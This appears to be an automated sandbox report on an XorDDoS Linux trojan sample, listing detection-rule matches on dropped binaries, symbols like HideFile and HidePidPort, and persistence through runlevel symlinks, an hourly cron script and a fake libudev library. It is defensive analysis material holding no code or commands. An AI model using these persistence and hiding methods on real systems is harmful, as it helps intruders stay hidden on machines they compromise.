Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/wobaryykiz, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/zfzhrlhjxr, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/tgdthymawi, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/gcfolkfaec, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/mbeioyodii, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/drdxrfohux, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: /usr/bin/doxgrgkpoa, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS

Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: HideFile
Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: HidePidPort
Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: __after_morecore_hook
Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: __free_hook
Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: __libc_register_dl_open_hook
Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: __libc_register_dlfcn_hook
Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: __malloc_hook
Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: __malloc_initialize_hook
Source: dptxrnhxmx.elf	ELF static info symbol of initial sample: __memalign_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: HideFile
Source: libudev.so.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __free_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: libudev.so.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: HideFile
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: __free_hook
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: qabtuykfdb.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: HideFile
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: __free_hook
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: wrvptdarnp.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: HideFile
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: __free_hook
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: mbeioyodii.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: HideFile
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: __free_hook
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: wobaryykiz.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: HideFile
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: __free_hook
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: rhlqbltizb.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: HideFile
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: __free_hook
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: gcfolkfaec.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: HideFile
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: __free_hook
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: scllcnzpeu.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: HideFile
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: __free_hook
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: tgdthymawi.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: HideFile
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: __free_hook
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: drdxrfohux.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: HideFile
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: __free_hook
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: doxgrgkpoa.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: HideFile
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: __free_hook
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: mntlutgnfs.11.dr	ELF static info symbol of dropped file: __memalign_hook
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: HideFile
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: HidePidPort
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: __after_morecore_hook
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: __free_hook
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: __libc_register_dl_open_hook
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: __libc_register_dlfcn_hook
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: __malloc_hook
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: __malloc_initialize_hook
Source: zfzhrlhjxr.11.dr	ELF static info symbol of dropped file: __memalign_hook

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/19@0/0

Source: /tmp/dptxrnhxmx.elf (PID: 6209)

/run/gcc.pid: myqtggqhibmhvmkvmysnhuayfhwdfvnt

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc1.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc2.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc3.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc4.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc5.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc.d/rc1.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc.d/rc2.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc.d/rc3.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc.d/rc4.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/rc.d/rc5.d/S90dptxrnhxmx.elf -> /etc/init.d/dptxrnhxmx.elf	Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File: /etc/cron.hourly/gcc.sh	Jump to behavior
Source: /bin/sh (PID: 6214)	File: /etc/crontab	Jump to behavior
Source: /bin/sed (PID: 6215)	File: /etc/crontab	Jump to behavior

Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/lib/libudev.so	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/qabtuykfdb	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/wrvptdarnp	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/mbeioyodii	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/wobaryykiz	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/rhlqbltizb	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/gcfolkfaec	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/scllcnzpeu	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/tgdthymawi	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/drdxrfohux	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/doxgrgkpoa	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/mntlutgnfs	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/zfzhrlhjxr	Jump to dropped file
Source: /tmp/dptxrnhxmx.elf (PID: 6209)	File written: /usr/bin/tqdlzqtrvv	Jump to dropped file

Source: /tmp/dptxrnhxmx.elf (PID: 6209)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

